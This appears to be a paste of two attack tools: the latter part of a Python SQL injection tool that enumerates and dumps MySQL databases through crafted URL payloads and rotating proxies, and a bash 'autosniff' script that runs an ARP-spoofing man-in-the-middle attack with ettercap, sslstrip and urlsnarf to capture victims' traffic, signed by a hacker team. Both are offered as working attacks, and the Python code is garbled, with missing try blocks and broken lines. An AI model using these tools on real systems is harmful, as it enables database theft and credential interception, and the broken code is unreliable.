file.write("\n| rsauron[@]gmail[dot]com v3.5 |") file.write("\n| 6/2008 |") file.write("\n| -MySQL v5+ Information_schema Database Enumeration |") file.write("\n| -MySQL v4+ Data Extractor |") file.write("\n| -MySQL v4+ Table & Column Fuzzer |") file.write("\n| Usage: [options] |") file.write("\n| -h help |") file.write("\n|---------------------------------------------------------------|") #Arg Error Checking if site == "": print "\n[-] Must include -u flag and specify a mode." print "[-] For help -h\n" sys.exit(1) if mode == "None": print "\n[-] Mode must be specified --schema, --dbs, --dump, --fuzz, --info." print "[-] For help -h\n" sys.exit(1) if mode == "--schema" and arg_database == "None": print "[-] Must include -D flag!" print "[-] For Help -h\n" sys.exit(1) if mode == "--dump": if arg_table == "None" or arg_columns == "None": print "[-] If MySQL v5+ must include -D, -T and -C flag when --dump specified!" print "[-] If MySQL v4+ must include -T and -C flag when --dump specified!" print "[-] For help -h\n" sys.exit(1) if site.find("pangeran90") == -1: print "\n[-] Site must contain \'pangeran90\'\n" sys.exit(1) if proxy != "None": if len(proxy.split(".")) == 2: proxy = open(proxy, "r").read() if proxy.endswith("\n"): proxy = proxy.rstrip("\n") proxy = proxy.split("\n") if arg_columns != "None": arg_columns = arg_columns.split(",") if site[:7] != "http://": site = "http://"+site if site.endswith("/*"): site = site.rstrip('/*') if site.endswith("--"): site = site.rstrip('--') #Build proxy list print "\n[+] URL:",site file.write("\n\n[+] URL:"+site+"\n") socket.setdefaulttimeout(7) proxy_list = [] if proxy != "None": file.writelines("[+] Building Proxy List...") print "[+] Building Proxy List..." for p in proxy: try: proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'}) opener = urllib2.build_opener(proxy_handler) gets+=1"") proxy_list.append(urllib2.build_opener(proxy_handler)) file.writelines("\n\tProxy:"+p+"- Success") print "\tProxy:",p,"- Success" except: file.writelines("\tProxy:"+p+"- Failed") print "\tProxy:",p,"- Failed" pass if len(proxy_list) == 0: print "[-] All proxies have failed. App Exiting" sys.exit(1) print "[+] Proxy List Complete" file.writelines("[+] Proxy List Complete") else: print "[-] Proxy Not Given" file.writelines("[+] Proxy Not Given") proxy_list.append(urllib2.build_opener()) #Retireve version:user:database head_URL = site.replace("pangeran90","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end print "[+] Gathering MySQL Server Configuration..." file.write("\n[+] Gathering MySQL Server Configuration...\n") proxy_num = 0 proxy_len = len(proxy_list) while 1: try: gets+=1 source = proxy_list[proxy_num % proxy_len].open(head_URL).read() # Uncomment the following lines to debug issues with gathering server information # print head_URL # print source match = re.findall("\x1e\x1e\S+",source) if len(match) >= 1:
match = match[0][2:].split("\x1e")
version = match[0]
user = match[1]
database = match[2]
print "\tDatabase:", database
print "\tUser:", user
print "\tVersion:", version
file.writelines("\tDatabase: "+database+"\n")
file.writelines("\tUser: "+user+"\n")
file.writelines("\tVersion: "+version)
version = version[0]
if mode == "--info":
print "[-] Done\n"
file.write("\n[-] Done\n")
print "[-] No Data Found"
except (KeyboardInterrupt, SystemExit):

#lets check what we can do based on version
if mode == "--schema" or mode == "--dbs":
if int(version) == 4:
print "\n[-] Only can use --schema or --dbs mode on MySQL v5+ servers!"
print "[-] -h for help"
#Build URLS
if mode == "--schema":
if arg_database != "None" and arg_table == "None":
print "[+] Showing Tables & Columns from database \""+arg_database+"\"\n"
file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"\n")
line_URL = site.replace("pangeran90","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema+=+0x"+arg_database.encode("hex")
count_URL = site.replace("pangeran90","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema+=+0x"+arg_database.encode("hex")+arg_end
arg_row = "Tables"
if arg_database != "None" and arg_table != "None":
print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\"\n"
file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"\n")
line_URL = site.replace("pangeran90","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema+=+0x"+arg_database.encode("hex")
line_URL += "+and+table_name+=+0x"+arg_table.encode("hex")
count_URL = site.replace("pangeran90","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema+=+0x"+arg_database.encode("hex")
count_URL += "+and+table_name+=+0x"+arg_table.encode("hex")+arg_end
arg_row = "Columns"
elif mode == "--dump":
print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
print "[+] and Column(s) "+str(arg_columns)+"\n"
file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
file.write("\n[+] Column(s) "+str(arg_columns)+"\n")
for column in arg_columns:
pangeran90 += column+",0x1e,"
count_URL = site.replace("pangeran90","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += "+from+"+arg_database+"."+arg_table+arg_end
line_URL = site.replace("pangeran90",pangeran90+"0x20)")
line_URL += "+from+"+arg_database+"."+arg_table
if int(version) == 4:
count_URL = site.replace("pangeran90","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += "+FROM+"+arg_table+arg_end
line_URL = site.replace("pangeran90",pangeran90+"0x20)")
line_URL += "+from+"+arg_table
elif mode == "--dbs":
print "[+] Showing all databases current user has access too!\n"
file.write("\n[+] Showing all databases current user has access too!\n")
count_URL = site.replace("pangeran90","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+arg_end
line_URL = site.replace("pangeran90","concat(0x1e,0x1e,schema_name,0x1e,0x20)")
line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")
arg_row = "Databases"
line_URL += "+LIMIT+NUM,1"+arg_end
#Uncomment the lines below to debug issues with the line_URL or count_URL
#print count_URL
#print line_URL

#Fuzz table/columns
if mode == "--fuzz":
print "[+] Fuzzing Tables & Columns..."
file.writelines("\n[+] Fuzzing Tables & Columns...")
fuzz_URL = site+"+from+TABLE"+arg_end
for table in fuzz_tables:
table_URL = fuzz_URL.replace("TABLE",table)
source = proxy_list[proxy_num % proxy_len].open(table_URL).read()
e = [error for error in TABLE_ERRORS if, source)]
if len(e) == 0:
print "\n[Table]:",table
for column in fuzz_columns:
source = proxy_list[proxy_num % proxy_len].open(table_URL.replace("pangeran90", column)).read()
# Uncomment the line below to debug issues with the fuzzer
# print source
e = [error for error in COLUMN_ERRORS if, source)]
if len(e) == 0:
print "[Column]:",column
except (KeyboardInterrupt, SystemExit):
except (KeyboardInterrupt, SystemExit):
print "\n[%s]" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[%s]" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] Done\n"
file.write("\n[-] Done\n")
print "Don't forget to check", dbt,"\n"

#Lets Count how many rows or columns
print "[%s]" % time.strftime("%X")
file.write("\n[%s]" % time.strftime("%X"))
source = proxy_list[proxy_num % proxy_len].open(count_URL).read()
match = re.findall("\x1e\x1e\S+",source)
match = match[0][2:].split("\x1e")
row_value = match[0]
print "[+] Number of "+arg_row+": "+row_value,"\n"
file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n")

##Schema Enumeration and DataExt loop
if mode == "--schema" or mode == "--dump" or mode == "--dbs":
while str(row_value) != str(table_num):
source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read()
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
if mode == "--schema":
match = match[0][2:].split("\x1e")
if cur_db != match[0]:
if terminal != "":
print terminal,"\n"
terminal = ""
cur_db = match[0]
file.writelines("\n[Database]: "+match[0]+"\n")
print "[Database]: "+match[0]+"\n"
table_num = 0
print "[Table: Columns]"
file.writelines("\n[Table: Columns]")
if cur_table != match[1]:
if terminal != "":
print terminal
cur_table = match[1]
file.writelines("\n["+str(table_num)+"]"+match[1]+": "+match[2])
terminal = "["+str(table_num)+"]"+match[1]+": "+match[2]
terminal += ","+match[2]
#Gathering Databases only
elif mode == "--dbs":
match = match[0]
print "["+str(num)+"]",match
#Collect data from tables & columns
elif mode == "--dump":
match = match[0].strip("\x1e").split("\x1e")
print "["+str(num)+"]",match
if num == 0:
print "\n[-] No Data Found"
#Uncomment the following line for proxy debugging
# print source
except (KeyboardInterrupt, SystemExit):
#Uncomment the following line for proxy debugging
# print (proxy_num % proxy_len), sys.exc_info()
if terminal != "":
print terminal

#Lets wrap it up!
print "\n[%s]" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[%s]" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] Done\n"
file.write("\n[-] Done\n")
print "Don't forget to check", dbt,"\n"

new autosniff

echo -n "Acces wireshark when finis? If yes, [enter] "
read -e NOYES
echo -n "Do you want to extract pitcures from the pcap via tcptract? If yws, [enter] "
read -e XTRACT
echo -n "Interfaces ? example wlan0: "
read -e IFACE
echo -n "Name of "Session"? (Give Name for folder) : "
read -e SESSION
echo -n "Gateway IP - empty to default: "
read -e ROUTER
echo -n "Target IP - Empty to scan all IP Addres: "
read -e VICTIM
mkdir /root/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
sslstrip -p -k -w /root/$SESSION/$SESSION.log &
iptables -t nat -A PREROUTING -p tcp --destionation-port 80 -j REDIRECT --to-port 10000
urlsnarf -i $IFACE | grep htpp > /root/$Session/$Session.txt &
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$SOUTER/ /$VICTIM/
"$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
"$NOYES"wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/$SESSION/$SESSION.eci
## jakarta_hacker_team ##

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